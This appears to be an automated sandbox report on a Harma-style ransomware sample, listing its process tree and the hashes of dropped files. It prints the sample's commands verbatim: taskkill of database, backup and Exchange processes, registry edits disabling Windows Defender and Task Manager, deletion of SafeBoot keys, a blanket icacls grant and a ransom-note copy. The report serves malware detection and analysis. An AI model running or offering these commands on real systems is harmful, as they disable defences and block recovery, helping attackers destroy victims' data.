C:\Windows\SysWOW64\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /t /f /im sql*3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /t /f /im sql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Copy HRMPRIV C:\ProgramData\HRMPRIV2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Copy HRMPUB C:\ProgramData\HRMPUB2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Copy id.harma C:\ProgramData\id.harma2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Copy C:\ProgramData\HRMPRIV %userprofile%\Desktop\HRMPRIV2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\FILES ENCRYPTED.txt" "%userprofile%\Desktop\FILES ENCRYPTED.txt"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\SysWOW64\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\SysWOW64\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\HRMPRIVFilesize
2KB
MD57c107d9b098e33a04bfeccb44fbf702e
SHA10583738ed9ef3375038292a3aa4c1c7e7b97e44e
SHA256cd0ba3a1dfd53b2019e78f937937e78fa3481328b8b6c111982cd28357e5c310
SHA512b457e07c56a5b2f28d0890d4ceaeb5605406d2f806717b38c8bec5eb10d821ce6fa2b612cea95e41a9ec761bea3ea8d173677712e876bb5c722107153f60b4d7
-
C:\ProgramData\harma.exeFilesize
913KB
MD530e1234ef3e570667526fdb006832b12
SHA101de8ba945945b58824f69553ac0f7b048645d45
SHA25672ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2
SHA51200bd673f43cba1b16363433e672b30d22196fa0b67c024f970da15270323e545d15b3b990ed1dbbc3e7b9421c3f7840b10621c76203f89e0bcb1214e2a129e4e
-
C:\ProgramData\id.harmaFilesize
8B
MD52c487fadba9fe41178c3206009e098be
SHA1ac6edfa29014d4fe1518ad422ba9e6149a596d57
SHA25644040e482ffbfe30d6b288a113a6f16998e8cb281b991fdc632a7bf57671065e
SHA5127d003ec43f75f08197c246e2364f576f453f1b78e4fc3d4a4ad2271c4e1b205aa961ac43070c0bebc11b9bb126d283d93f9c93e0773033309afef5832d0db7d3
-
C:\Users\Admin\AppData\Local\Temp\HRMPUBFilesize
292B
MD524da1445244b35f9f96825d6d5ac2d4b
SHA1a7ac4cd7fb3d86ae1f3171fb2b91a7f0c71ec276
SHA25642076e5df8ff25d78fea600636b9f70163bb866e29b725b4fe5cdbbe7bb205a5
SHA512fdae6de128e49d29437f93e73b9a330f369b7212e5e2eb8b1d76ec7142408be0cc81e3a3adfc916f461a7de37da329aaaa66b60974c20dde2222af547bccb794